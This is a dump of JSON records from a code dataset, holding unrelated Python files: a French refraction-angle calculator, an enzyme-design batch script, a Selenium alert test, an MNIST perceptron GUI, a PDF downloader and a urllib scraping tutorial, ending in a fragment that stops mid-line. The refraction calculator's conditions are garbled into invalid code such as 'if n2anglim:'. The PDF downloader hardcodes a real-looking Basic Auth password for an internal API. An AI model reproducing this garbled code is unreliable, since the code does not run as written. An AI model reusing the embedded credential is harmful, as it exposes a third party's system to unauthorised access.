+{"seq_id":"42182525527","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nimport math\nfrom time import sleep\n\"\"\"\nRappel : indice réfraction air : 1 (ou presque)\nindice réfraction verre : 1,5 (en moyenne)\nindice réfraction eau : 1,33333 (4/3)\n\"\"\"\ndef foncTransmis():\n n1=float(input(\"Entrez l'incide de réfraction du premier milieu : \"))\n n2=float(input(\"Entrez l'incide de réfraction du second milieu : \"))\n angl1=float(input(\"Entrez l'angle d'incidence en degrés \"))\n angle1=math.pi*angl1/180\n print(\"Vous avez entré\",angl1,\"° soit\",angle1,\"rad.\")\n if n2anglim:\n print(\"Ce calcul est impossible, il y aura réflexion complète.\")\n else:\n angl2=abs(math.asin(math.sin(angle1)*n1/n2))*180/math.pi\n print(\"L'angle\",angl1,\"° incident sortira avec un angle\",angl2,\"°.\")\n return(True)\n\ndef foncIncident():\n n1=float(input(\"Entrez l'incide de réfraction du premier milieu : \"))\n n2=float(input(\"Entrez l'incide de réfraction du second milieu : \"))\n angl2=float(input(\"Entrez l'angle de réfraction en degrés \"))\n angle2=math.pi*angl2/180\n if n1anglim:\n print(\"Ce calcul est impossible, il y aura réflexion complète.\")\n else:\n angl1=abs(math.asin(math.sin(angle2)*n2/n1))*180/math.pi\n print(\"L'angle\",angl2,\"° transmis est issu d'un angle\",angl1,\"° incident.\")\n return(True)\n\ndef foncIndiceDeux():\n n1=float(input(\"Entrez l'indice de réfraction du milieu incident. \"))\n angli=float(input(\"Entrez l'angle d'incidence en degrés : \"))\n anglt=float(input(\"Entrez l'angle de transmission en degrés : \"))\n if anglt%180==0:\n print(\"Calcul impossible, division par zéro\")\n else:\n n2=n1*math.sin(angli*math.pi/180)/math.sin(anglt*math.pi/180)\n print(\"L'indice de réfraction du 2eme milieu vaut\",n2)\n return(True)\n\ndef foncIndiceUn():\n n2=float(input(\"Entrez l'indice de réfraction du milieu incident. \"))\n angli=float(input(\"Entrez l'angle d'incidence en degrés : \"))\n anglt=float(input(\"Entrez l'angle de transmission en degrés : \"))\n if angli%180==0:\n print(\"Calcul impossible, division par zéro\")\n else:\n n1=n2*math.sin(anglt*math.pi/180)/math.sin(angli*math.pi/180)\n print(\"L'indice de réfraction du 2eme milieu vaut\",n2)\n return(True)\n\n\nboucler=True\n\nwhile boucler:\n print(\"\")\n print(\"Menu principal\")\n print(\"==============\")\n print(\"\")\n print(\"Veuillez saisir un choix et valider.\")\n print(\"[1] : Calcul angle transmis\")\n print(\"[2] : Calcul angle incident\")\n print(\"[3] : Calcul indice réfraction milieu 2\")\n print(\"[4] : Calcul indice réfraction milieu 1\")\n print(\"[q] : Quitter\")\n choix=input(\"> \")\n if choix=='1':\n foncTransmis()\n elif choix=='2':\n foncIncident()\n elif choix=='3':\n foncIndiceDeux()\n elif choix=='4':\n foncIndiceUn()\n elif choix=='42':\n print(\"Vous avez la réponse ...\")\n boucler=True\n elif choix=='q':\n print(\"Vous avez choisi de nous quitter, au revoir.\")\n boucler=False\n else:\n print(\"Saisie erronée, avez-vous vérifié le blocage des majuscules ?\")\nprint(\"(c) F.S.G. Juin 2022\")","repo_name":"fgonz666/FormationSmartphones","sub_path":"c5-1.pc.ac lois snell descartes/snell-descartes.py","file_name":"snell-descartes.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10514129400","text":"from sys import argv\nfrom time import sleep, time\nfrom multiprocessing import Pool\nimport os,json,glob\nfrom postDesignClass_v2 import postDesign\nimport numpy as np\nimport pandas as pd\nfrom glob import glob\nimport os, json, shutil, itertools\n\n\n# load parameter file\nwith open(argv[1]) as jsonfile:\n\txParams = json.load(jsonfile)\n\nstage = argv[2] # stage options are PFC, RM, ordered or test\nstage = stage.lower()\nstart = time()\n\nif stage == 'ordered':\n\tPDB = glob.glob('../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/hpDesigned'+'/*.pdb')\nelse:\n\t# Reading data frame\n\tdf = pd.read_csv(argv[3], delimiter='\\t')\n\n\n# input a file_increment, or it will grab the folder with the largest increment to start with\nif len(argv) > 4:\n\tfile_incre = \"{:02d}\".format(int(argv[4]))\nelse:\n\tfor i in itertools.count(start=1):\n\t\tif not os.path.exists('../'+xParams['PDBID']+'/CLUSTERX_'+\"{:02d}\".format(i)+'/'):\n\t\t\tfile_incre = \"{:02d}\".format(i-1)\n\t\t\tbreak\n\n# making necessary folders\ntry:\n\tos.mkdir('../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/PFCheck')\n\tos.mkdir('../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/PFCheck/logs')\n\tos.mkdir('../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/PFCheck/Clv')\n\tos.mkdir('../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/PFCheck/PFChecked')\n\tos.mkdir('../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/PFCheck/Trans')\n\tos.mkdir('../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/PFCheck/Min_des')\n\tos.mkdir('../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/PFCheck/Rlx_test')\n\tprint('\\n\\n\\nFolders generated\\n\\n\\n')\nexcept:\n\tprint('\\n\\n\\nFolders exist\\n\\n\\n')\n\n\n#-------------------------------------------Below is the functions in this script---------------------------------\ndef get_shorter_name(somepdb,des_code,cut):\n\t'''\n\tNice function to change nasty pdb filenames into manageable codes that are still unique and identifying, based on current naming conventions (7-2-2021)\n\tInputs: pdbname\t\tstr\t\t\tAssumed to be formatted as usual in the scoring process\n\t\t\tdes_code\tstr\t\t\tThe design number to be included in the short_name\n\t\t\tcut\t\t\tbool\t\tWhether this scorefile was taken from cleaved structures or not\n\t'''\n\tif cut:\n\t\treturn 'd'+des_code+'_'+somepdb[-19:-15].lstrip('0')+somepdb[-13:-10].lstrip('0')+somepdb[-10:-8].lstrip('0')\n\treturn 'd'+des_code+'_'+somepdb[-19:-15].lstrip('0')+somepdb[-13:-10].lstrip('0')+somepdb[-10:-8].lstrip('0')\n\ndef print_top(df,sort_by_colum,num_print=10,ascending=True):\n\ttemp_df = df\n\tif ascending:\n\t\ttemp_df = temp_df.sort_values(sort_by_colum,ignore_index=True, ascending=True)\n\telse:\n\t\ttemp_df = temp_df.sort_values(sort_by_colum,ignore_index=True, ascending=False)\n\n\treturn temp_df[sort_by_colum].iloc[:num_print]\n\ndef product_plot2D(term1,term2,prod_term,df,percent_list=[0.005,0.01,0.05,0.1,0.25],term1_lower_bound=False,term2_lower_bound=False,topnum=7,general_plot_marker='.',top_plot_marker='d',manual_plot_marker='x'):\n\t'''\n\tA function to make a 2D plot of 2 term product based metrics. Will serve as a blueprint for a 3D version. percent_list should list the percentages of data points (decimal form) that are as good or better than the line. Assumes that higher scores are preferred.\n\tINPUTS:\t\tterm1\t\t\tstr\t\t\tkey for first term in dataframe\n\t\t\t\tterm2\t\t\tstr\t\t\tkey for second term in dataframe\n\t\t\t\tprod_term\t\tstr\t\t\tkey for product in dataframe\n\t\t\t\tdf\t\t\t\tDataFrame\tdataframe of scores\n\t\t\t\tpercent_list\tlist\t\tlist of float values determining dotted lines\n\tRETURNS:\t(fig,ax)\t\t\tpyplot figure and axis objects, dataframe of automatic selections\n\t'''\n\t# Simple scatter of all the points\n\tfig,ax = plt.subplots(1)\n\tax.set_title(prod_term)\n\tdf.plot.scatter(term1,term2,ax=ax,label='All sequences',marker=general_plot_marker)\n\n\tfor some_cutoff in percent_list:\n\t\tsome_index = int(len(df)*some_cutoff)\n\t\tprod_val = sorted_df.iloc[some_index][prod_term]\n\t\tx = np.linspace(df[term1].min(),df[term1].max(),100)\n\t\tax.plot(x,prod_val/x,'--k')\n\tif term2_lower_bound:\n\t\tax.set_ylim(term2_lower_bound,df[term2].max()*1.05)\n\telse:\n\t\tax.set_ylim(df[term2].min(),df[term2].max()*1.05)\n\tif term1_lower_bound:\n\t\tax.set_xlim(term1_lower_bound,x[-1])\n\tax.spines['top'].set_visible(False)\n\tax.spines['right'].set_visible(False)\n\treturn fig,ax\n\ndef runPostDesign(i):\n\t''' A function to run the hydrophobic design, will eventually turn into a function inside the design class, in here to make sure that it properly coordinates with the multithreading module for now.'''\n\tsuffix = df.iloc[i]['pdbFN'][-12:]\n\trot1 = postDesign(rotamer=df.iloc[i]['Rotamer'], designStage='hpDesigned', fileIncre=file_incre, designSuffix=suffix, **xParams)\n\trot1.runPFC()\n\tprint('\\n\\n\\nStarted on rotamer: ',df['pdbFN'][i],'\\n\\n\\n')\n\ndef runPFC_ordered(i):\n\tsuffix = PDB[i][-12:]\n\trot1 = postDesign(rotamer=int(PDB[i][-15:-12]), designStage='hpDesigned', fileIncre=file_incre, designSuffix=suffix, **xParams)\n\trot1.runPFC()\n\tprint('\\n\\n\\nStarted on rotamer: ',PDB[i],'\\n\\n\\n')\n\ndef runTestPFC(i,suffix):\n\trot1 = postDesign(rotamer=i, designStage='hpDesigned', fileIncre=file_incre, designSuffix=suffix, **xParams)\n\trot1.runPFC()\n\ndef runRevertMut(i):\n\t''' A function to run the hydrophobic design, will eventually turn into a function inside the design class, in here to make sure that it properly coordinates with the multithreading module for now.'''\n\tsuffix = df.iloc[i]['pdbFN'][-12:]\n\trot1 = postDesign(rotamer=df.iloc[i]['Rotamer'], designStage='hpDesigned', fileIncre=file_incre, designSuffix=suffix, **xParams)\n\trot1.runPFC(revertMut=True)\n\tprint('\\n\\n\\nStarted on rotamer: ',df['pdbFN'][i],'\\n\\n\\n')\n\ndef runPreformFilter():\n\n\t# make directory for the result file\n\ttry:\n\t\tos.mkdir('../'+xParams['PDBID']+'/passedPFC')\n\t\tos.mkdir('../'+xParams['PDBID']+'/passedPFC/result_plots')\n\t\tprint('Folder created\\n\\n')\n\texcept:\n\t\tprint('Folder exists\\n\\n')\n\n\tpass_log_folder = '../'+xParams['PDBID']+'/passedPFC/'\n\n\t# Set paths for log files and result file\n\tlogFolder = '../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/PFChecklogs/*'\n\tsaveFN = pass_log_folder+xParams['PDBID']+'_CLUSTERX_'+file_incre+'_passedPFC.txt'\n\n\t# Make a glob that has all the log files\n\tlogFiles = glob(logFolder)\n\n\t# Initialize a dataframe to hold all the information\n\tdf = pd.DataFrame(columns=['pdbFN_CUT','pdbFN_MIN','total_ETE_score','initial_score',\n\t\t\t\t\t\t\t 'bound(minimized)','cut_score','rlx_test_score','translated(trans-preMin)',\n\t\t\t\t\t\t\t 'unbound(trans-Min)','numHB','total_hEn','SASA','SC','Bunsat','fa_rep','intra',\n\t\t\t\t\t\t\t 'fa_atr','IE1_2','IE1_3','RMSD_BS','RMSD_ETE','Rotamer','clusterCenter','FASTA'])\n\t\n\tfor fn in logFiles:\n\t\tlogDF = pd.read_csv(fn,delimiter='\\t')\n\t\tdf = df.append(logDF,ignore_index=True)\n\n\t'''\n\t# Currently just manually put in some cutoffs\n\tclashMax = 15\n\tatrMax = -15\n\tintra_Max = 20\n\tbound_hdx_Min = 3\n\tstg_hb_Min = 1\n\thdx_hbNo_Min = 3\n\tper_hdx_hEnMax = -0.9\n\tSASA_Max = 8\n\trmsd_Max = 1\n\tIE_Max = 10\n\tSC_Min = 0.6\n\t'''\n\n\t# Set filter and output to a file\n\tdf.reset_index(inplace=True,drop=True)\n\tboundhdxFilter = df['numHB'] >= xPrarms['hbCountMin']\n\ttotalHBEnFilter = df['total_hEn'] <= xPrarms['hbEnMax']\n\tclsFilter = df['fa_rep'] <= xPrarms['clashMax']\n\tatrFilter = df['fa_atr'] <= xPrarms['atrMax']\n\tintraFilter = df['intra'] <= xPrarms['intraMax']\n\tSASAFilter = df['SASA'] <= xPrarms['SASA_Max']\n\tSCfilter = df['SC'] >= xPrarms['SC_Min']\n\t#hdx_NoFilter = df['hdx_hbNo'] >= hdx_hbNo_Min\n\t#G_EnFilter = df['G_hEn'] <= per_hdx_hEnMax\n\t#D_EnFilter = df['D_hEn'] <= per_hdx_hEnMax\n\t#E_EnFilter = df['E_hEn'] <= per_hdx_hEnMax\n\t#IE1_2Filter = df['IE1_2'] <= IE_Max\n\t#IE1_3Filter = df['IE1_3'] <= IE_Max\n\t#rmsdBSFilter = df['RMSD_BS'] <= rmsd_Max\n\t#rmsdETEFilter = df['RMSD_ETE'] <= rmsd_Max\n\t\n\n\n\tcombinedFilter = boundhdxFilter & totalHBEnFilter & clsFilter & atrFilter & intraFilter & SASAFilter & SCfilter\n\t#& G_EnFilter & D_EnFilter & E_EnFilter & IE1_2Filter & IE1_3Filter & hdx_NoFilter & rmsdBSFilter & rmsdETEFilter\n\n\tgood_PFC = df[combinedFilter]\n\t#good_PFC = good_PFC.sort_values(by=['IE1_3'],ascending=True)\n\tgood_PFC.reset_index(inplace=True)\n\tprint('\\nPreformation check has Completed!!!!\\n\\n', len(good_PFC),'structures passed PFC!!!!')\n\tprint('\\nInitiating analysis and plotting processes....')\n\tdesignCode = file_incre.lstrip('0')\n\n\tgood_PFC['short_name'] = [get_shorter_name(somepdb,designCode,False) for somepdb in good_PFC['pdbFN_CUT']]\n\tgood_PFC['hb*SC'] = good_PFC['total_hEn']*good_PFC['SC']\n\n\ttop10 = print_top(good_PFC, sort_by_colum='hb*SC', ascending=False)\n\n\tprint('Top 10 structures are:\\n',top10)\n\n\tgood_PFC.to_csv(saveFN,sep='\\t',index=False)\n\n\tplot_fig,plot_ax,plot_df = product_plot2D('SC','total_hEn','hb*SC',good_PFC)\n\tplot_fig.savefig('../'+xParams['PDBID']+'/passedPFC/result_plots/'+xParams['PDBID']+'_'+file_incre+'_HB&SC_Product.png',dpi=300)\n\tprint('\\nAnalysis and plotting are completed!!!!')\n\n\t# Initiate the process that pulls the candidates to a folder\n\ttry:\n\t\tos.mkdir('../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/top10/')\n\texcept:\n\t\tprint('Folder exists')\n\n\ttop10folder = '../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/top10/'\n\n\tfor i in range(0,10):\n\t\tshutil.copyfile(good_PFC['short_name'][i], top10folder+good_PFC['short_name'][i])\n\tprint('\\nThe top 10 structures are copied into:',top10folder)\n\n#------------------------------------------------------------------------------------------------------------------\n\nmyPool = Pool(processes=30)\n\nif stage == 'pfc':\n\t# Initiate multithreading for preformCheck\n\tfor i in myPool.imap_unordered(runPostDesign,range(len(df))):\n\t\tprint('initiating preform check\\n\\n\\n')\n\tprint('\\nPFC completed, initiating filter....')\n\trunPreformFilter()\n\nelif stage == 'rm':\n\t# Initiate multithreading for RevertMut\n\tfor i in myPool.imap_unordered(runRevertMut,range(len(df))):\n\t\tprint('initiating preform check\\n\\n\\n')\n\tprint('\\nPFC completed, initiating filter....')\n\trunPreformFilter()\n\nelif stage == 'ordered':\n\t# Initiate multithreading for PFC for the ordered structrues\n\tfor i in myPool.imap_unordered(runPFC_ordered,range(len(PDB))):\n\t\tprint('initiating preform check\\n\\n\\n')\n\tprint('\\nPFC completed, initiating filter....')\n\trunPreformFilter()\n\n# For single test run \nelif stage == 'test':\n\tsuffix = '_C_02_01.pdb'\n\trunTestPFC(362,suffix)\n\n\nend = time()\n\nd = end - start\n\nif d >= 3600:\n\tprint('\\nTotal run time was', d/3600, 'hr')\nif 60 <= d < 3600:\n\tprint('\\nTotal run time was', d/60, 'min')\nif d < 60:\n\tprint('\\nTotal run time was', d, 'sec')","repo_name":"yijietseng/Radical_EnzDes_scripts","sub_path":"PFCDrive.py","file_name":"PFCDrive.py","file_ext":"py","file_size_in_byte":10372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25472581689","text":"import time\nfrom pages.download_upload_page import *\nfrom pages.row_page import *\nfrom pages.checkboxes_page import *\nfrom pages.doubleClick_page import *\nfrom pages.alerts_page import *\nimport unittest\n\n\nclass Alerts(unittest.TestCase):\n def test_alerts(self):\n url = \"https://demoqa.com/alerts\"\n alert_func = AlertsMethods(url)\n alert_func.click(first_btn_id)\n alert_func.accept_wait_alerts()\n alert_func.click(second_btn_id)\n alert_func.waiting(get_result_text)\n alert_func.accept_wait_alerts()\n alert_func.click(third_btn_id)\n alert_func.dismiss_wait_alerts()\n text = alert_func.get_text(get_result_text)\n print(text)\n self.assertEqual(third_btn_expected_result, text,\n \"Clicked Text Not Matched - Failed\")\n alert_func.click(forth_btn_id)\n alert_func.promt_wait_alerts(prompt_input_value)\n text = alert_func.get_text(prompt_result_text_id)\n clean_text = alert_func.clean_text(text, prompt_input_value)\n print(clean_text)\n self.assertEqual(clean_text, prompt_input_value,\n \"Text Not Match - Failed\")\n alert_func.tearDown()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"salmanahmad21/Automation_Training","sub_path":"Training_POM/tests/alerts_test.py","file_name":"alerts_test.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37673803083","text":"from struct import unpack\nfrom PIL import Image\nfrom PIL import ImageOps\nfrom PyQt5.QtGui import QGuiApplication, QImage\nfrom PyQt5.QtQml import QQmlApplicationEngine, qmlRegisterType\nfrom PyQt5.QtCore import *\n\nimport sys\nimport numpy as np\nfrom PyQt5.QtQuick import QQuickPaintedItem\n\n\ndef read_idx1(file):\n with open(file, 'rb') as f:\n magic, length = unpack('>ii', f.read(8))\n if magic != 2049:\n raise RuntimeError('wrong file format')\n return np.fromfile(f, np.uint8, length).astype(np.int64)\n\n\ndef read_idx3(file):\n data = []\n with open(file, 'rb') as f:\n magic, length = unpack('>ii', f.read(8))\n if magic != 2051:\n raise RuntimeError('wrong file format')\n rows, columns = unpack('>ii', f.read(8))\n for i in range(length):\n img = np.fromfile(f, np.uint8, rows * columns).astype(np.float)\n img = img / 255\n data.append(img)\n return np.array(data)\n\n\ndef resize_image(data):\n img = Image.new('L', (28, 28))\n img.putdata(data)\n img = img.resize((12, 12), Image.ANTIALIAS)\n return np.array(img.getdata())\n\n\ndef create_dumb_network(input_count, hidden_count, output_count):\n scale = 1.0 / input_count ** (1 / 2)\n input2hidden = np.random.normal(0, scale, (input_count, hidden_count))\n hidden2output = np.random.uniform(size=(hidden_count, output_count)) / np.sqrt(hidden_count)\n delta0 = np.zeros((input_count, hidden_count)).astype(np.float)\n delta1 = np.zeros((hidden_count, output_count)).astype(np.float)\n return [input2hidden, hidden2output, delta0, delta1]\n\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\n\ndef tanh(x):\n return np.tanh(x)\n\n\ndef get_output(network, input):\n hidden_layer = tanh(np.dot(network[0].T, input))\n output_layer = sigmoid(np.dot(network[1].T, hidden_layer))\n return hidden_layer, output_layer\n\n\ndef correct_weights(network, input, output_layers, expected):\n hidden, output = output_layers\n # print(hidden)\n # print('output ', output)\n # print('expected', expected)\n delta_output = output * (1 - output) * (expected - output)\n\n error = np.dot(network[1], delta_output)\n delta_hidden = (1 - error * error) * error\n\n # network[3] = delta_output * np.reshape(output_layers[0], (output_layers[0].shape[0], 1))\n # network[2] = delta_hidden * np.reshape(input, (input.shape[0], 1))\n network[3] = delta_output * np.reshape(output_layers[0], (output_layers[0].shape[0], 1))\n network[2] = delta_hidden * np.reshape(input, (input.shape[0], 1))\n eta = 0.01\n network[0] += eta * network[2]\n network[1] += eta * network[3]\n # print(network)\n\n\ndef train_step(network, label, data):\n output = get_output(network, data)\n expected = np.array([1 if k == label else 0 for k in range(len(network[1][0]))]).astype(np.float)\n correct_weights(network, data, output, expected)\n return output[1], expected\n\n\ndef train_generation(network, train_labels, train_data):\n for idx, label in enumerate(train_labels):\n print('step:', idx)\n train_step(network, label, train_data[idx])\n\n\ndef train(network, train_labels, train_data):\n for i in range(1):\n # print('generation:', i)\n train_generation(network, train_labels, train_data)\n\n\ndef test(network, test_labels, test_data):\n for idx, label in enumerate(test_labels):\n test_step(network, label, test_data[idx])\n\n\ndef test_step(network, label, data):\n output = get_output(network, data)\n expected = np.array([1 if k == label else 0 for k in range(len(network[1][0]))]).astype(np.float)\n return output[1], expected\n\n\ndef data2image(data):\n data = data * 255\n data = data.astype(np.uint8)\n img = Image.new('L', (12, 12))\n img.putdata(data)\n img = ImageOps.invert(img)\n return img\n\n\nclass TrainGui(QObject):\n def __init__(self, parent=None):\n QObject.__init__(self, parent=parent)\n self.train_data = read_idx3('mnist/train.idx3-ubyte')\n self.train_labels = read_idx1('mnist/train.idx1-ubyte')\n self.network = create_dumb_network(28 * 28, 100, 10)\n self._index = -1\n self._paused = True\n self._timer = QTimer(parent=self)\n self._timer.timeout.connect(self.nextStep)\n self.nextStep()\n\n indexChanged = pyqtSignal()\n\n @pyqtProperty('int', notify=indexChanged)\n def index(self):\n return self._index\n\n pausedChanged = pyqtSignal()\n\n @pyqtProperty('bool', notify=pausedChanged)\n def paused(self):\n return self._paused\n\n @paused.setter\n def paused(self, spaused):\n self._paused = spaused\n if self._paused:\n self._timer.stop()\n else:\n self._timer.start()\n self.pausedChanged.emit()\n\n resultChanged = pyqtSignal()\n\n @pyqtProperty('QString', notify=resultChanged)\n def result(self):\n return self._result\n\n expectedChanged = pyqtSignal()\n\n @pyqtProperty('QString', notify=expectedChanged)\n def expected(self):\n return self._expected\n\n imageChanged = pyqtSignal()\n\n @pyqtProperty('QImage', notify=imageChanged)\n def image(self):\n data = self.train_data[self._index]\n data *= 255\n img = QImage(data.astype(np.uint8), 28, 28, QImage.Format_Grayscale8)\n img.invertPixels()\n return img\n\n @pyqtSlot()\n def nextStep(self):\n self._index += 1\n if self._index >= len(self.train_labels):\n self._index -= 1\n self.paused = True\n return\n self._result, self._expected = train_step(self.network,\n self.train_labels[self._index],\n self.train_data[self._index])\n frm = {'float_kind': lambda x: \"{0:.4f}\".format(x)}\n self._result = np.array2string(self._result, formatter=frm)\n self._expected = np.array2string(self._expected, formatter=frm)\n self.resultChanged.emit()\n self.expectedChanged.emit()\n self.indexChanged.emit()\n self.imageChanged.emit()\n\n\nclass TestGui(QObject):\n def __init__(self, network, parent=None):\n QObject.__init__(self, parent=parent)\n self.test_data = read_idx3('mnist/test.idx3-ubyte')\n self.test_labels = read_idx1('mnist/test.idx1-ubyte')\n self.network = network\n self._index = -1\n self._paused = True\n self._classified_right = 0\n self._timer = QTimer(parent=self)\n self._timer.timeout.connect(self.nextStep)\n self._expectednum = 0\n self._resultnum = 0\n self._result = ''\n self._expected = ''\n # self.nextStep()\n\n indexChanged = pyqtSignal()\n\n @pyqtProperty('int', notify=indexChanged)\n def index(self):\n return self._index\n\n pausedChanged = pyqtSignal()\n\n @pyqtProperty('bool', notify=pausedChanged)\n def paused(self):\n return self._paused\n\n @paused.setter\n def paused(self, spaused):\n self._paused = spaused\n if self._paused:\n self._timer.stop()\n else:\n self._timer.start()\n self.pausedChanged.emit()\n\n resultChanged = pyqtSignal()\n\n @pyqtProperty('QString', notify=resultChanged)\n def result(self):\n return self._result\n\n expectedChanged = pyqtSignal()\n\n @pyqtProperty('QString', notify=expectedChanged)\n def expected(self):\n return self._expected\n\n @pyqtProperty('int', notify=resultChanged)\n def resultnum(self):\n return self._resultnum\n\n @pyqtProperty('int', notify=expectedChanged)\n def expectednum(self):\n return self._expectednum\n\n imageChanged = pyqtSignal()\n\n @pyqtProperty('QImage', notify=imageChanged)\n def image(self):\n if self._index < 0:\n return QImage()\n data = self.test_data[self._index]\n data *= 255\n img = QImage(data.astype(np.uint8), 28, 28, QImage.Format_Grayscale8)\n img.invertPixels()\n return img\n\n @pyqtSlot()\n def nextStep(self):\n self._index += 1\n if self._index >= len(self.test_labels):\n self._index -= 1\n self.paused = True\n return\n self._result, self._expected = test_step(self.network,\n self.test_labels[self._index],\n self.test_data[self._index])\n frm = {'float_kind': lambda x: \"{0:.4f}\".format(x)}\n self._expectednum = np.argmax(self._expected)\n self._resultnum = np.argmax(self._result)\n self._result = np.array2string(self._result, formatter=frm)\n self._expected = np.array2string(self._expected, formatter=frm)\n if self._expectednum != self._resultnum:\n # self.paused = True\n print(self._classified_right / (self.index + 1))\n else:\n self._classified_right += 1\n self.resultChanged.emit()\n self.expectedChanged.emit()\n self.indexChanged.emit()\n self.imageChanged.emit()\n\n @pyqtSlot()\n def prevStep(self):\n self._index -= 1\n if self._index < 0:\n self._index += 1\n self.indexChanged.emit()\n self.imageChanged.emit()\n\nclass QImagePainter(QQuickPaintedItem):\n def __int__(self, parent=None):\n QQuickPaintedItem.__init__(self, parent=parent)\n self._image = QImage(28, 28, QImage.Format_Grayscale8)\n\n imageChanged = pyqtSignal()\n\n @pyqtProperty('QImage', notify=imageChanged)\n def image(self):\n return self._image\n\n @image.setter\n def image(self, simage):\n self._image = simage\n self.imageChanged.emit()\n self.update()\n\n def paint(self, painter):\n painter.drawImage(QPoint(0, 0), self._image.scaled(self.width(), self.height()))\n\n\nif __name__ == '__main__':\n # train_data = read_idx3('mnist/train.idx3-ubyte')\n # train_labels = read_idx1('mnist/train.idx1-ubyte')\n #\n # test_data = read_idx3('mnist/test.idx3-ubyte')\n # test_labels = read_idx1('mnist/test.idx1-ubyte')\n #\n # network = create_dumb_network(28 * 28, 100, 10)\n #\n # train(network, train_labels, train_data)\n # print('===== TEST =====')\n # test(network, test_labels, test_data)\n app = QGuiApplication(sys.argv)\n engine = QQmlApplicationEngine(parent=app)\n ctx = engine.rootContext()\n trainGui = TrainGui()\n ctx.setContextProperty(\"trainGui\", trainGui)\n testGui = TestGui(trainGui.network)\n ctx.setContextProperty(\"testGui\", testGui)\n qmlRegisterType(QImagePainter, \"PerceptronImagePainter\", 1, 0, \"ImagePainter\")\n engine.load(QUrl(\"gui/main.qml\"))\n exit(app.exec_())\n","repo_name":"gaudima/machine-learning","sub_path":"Lab6 - Perceptron/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22940772615","text":"import os\nimport requests\nfrom requests.auth import HTTPBasicAuth\n\n\ndef download_pdf_file(url: str) -> bool:\n \"\"\"Download PDF from given URL to local directory.\n\n :param url: The url of the PDF file to be downloaded\n :return: True if PDF file was successfully downloaded, otherwise False.\n \"\"\"\n\n # Request URL and get response object\n basic = HTTPBasicAuth('OMNI', 'uC#3%6UOc0q%C$mBMilN6GB72Lr30$DV')\n response = requests.get(url, stream=True, auth=basic)\n\n # isolate PDF filename from URL\n pdf_file_name = os.path.basename(url)\n if response.status_code == 200:\n # Save in current working directory\n filepath = os.path.join(os.getcwd(), pdf_file_name)\n with open(filepath, 'wb') as pdf_object:\n pdf_object.write(response.content)\n print(f'{pdf_file_name} was successfully saved!')\n return True\n else:\n print(f'Uh oh! Could not download {pdf_file_name},')\n print(f'HTTP response status code: {response.status_code}')\n return False\n\n\nif __name__ == '__main__':\n # URL from which pdfs to be downloaded\n URL = 'https://invoice-service.dgl-dev.tekoapis.net/invoice-service/service/download?orderId=230405120978260_SBN01&taxIdentify=OMNI_SELLER_SB'\n download_pdf_file(URL)","repo_name":"vrdong/leetcode_challenge","sub_path":"dowload_pdf/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"41821662118","text":"\"\"\"\nDate: 2022/04/17\n\"\"\"\nimport urllib.request as ur\nfrom configparser import ConfigParser\nimport urllib.parse as uparse\n\nconfig = ConfigParser()\nconfig.read(\"./urls.ini\")\nurl = config.get(\"url\",\"baidu\")\n\n#获取网页信息\ndef get_full(url):\n response = ur.urlopen(url)\n print(type(response))#HTTPResponse\n print(response.getcode())#状态码\n print(response.getheaders())#获取头\n print(response.geturl())#获取url\n # content为bytes类型\n content = response.readline()#读取一行\n print(content)\n content = response.read(20)#读取20个字节\n print(content)\n content = response.readlines()#返回包含所有行的列表\n # print(content)\n content = response.read().decode('utf-8')#默认获取整个网页\n\n# get_full(url)\n\n#下载\ndef download_from_url(url,filename):\n #第一个参数是url,第二个参数是文件保存位置\n ur.urlretrieve(url,filename)\n\n# download_from_url(url,\"./files/texts/baidu.html\")\n\nheader1 = {'User-Agent':\n'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36'}\n#定制请求对象\ndef custom_request(url,header):\n request = ur.Request(url=url,headers=header)\n response = ur.urlopen(request)\n content = response.read().decode('utf-8')\n print(content)\n'https://www.baidu.com/s?ie=UTF-8&wd=%E5%91%A8%E6%9D%B0%E4%BC%A6'\n#将字符串转为Unicode编码形式\n# custom_request(config.get(\"url\",\"jaychou\")+uparse.quote(\"周杰伦\"),header1)\n\npara = {'wd':'周杰伦','sex':\"男\"}#urlencode方法将其转为wd=%E5%91%A8%E6%9D%B0%E4%BC%A6&sex=%E7%94%B7的形式\n#将字典转为get请求的查询字符串形式\ndef construct_get_para(baseurl,para,header):\n entire_path = baseurl + uparse.urlencode(para)\n print(\"完整的请求路径是:{}\".format(entire_path))\n request = ur.Request(url=url, headers=header)\n response = ur.urlopen(request)\n content = response.read().decode('utf-8')\n print(content)\nconstruct_get_para(\"https://www.baidu.com/s?ie=UTF-8&\",para,header1)\n","repo_name":"TrellixVulnTeam/CodeCenter_4ZN7","sub_path":"爬虫/urllib的get请求的使用.py","file_name":"urllib的get请求的使用.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29983760107","text":"\ndef currently_winning(scores):\n yc = [scores[0]]\n oc = [scores[1]]\n for i in range(2, len(scores)):\n if i % 2 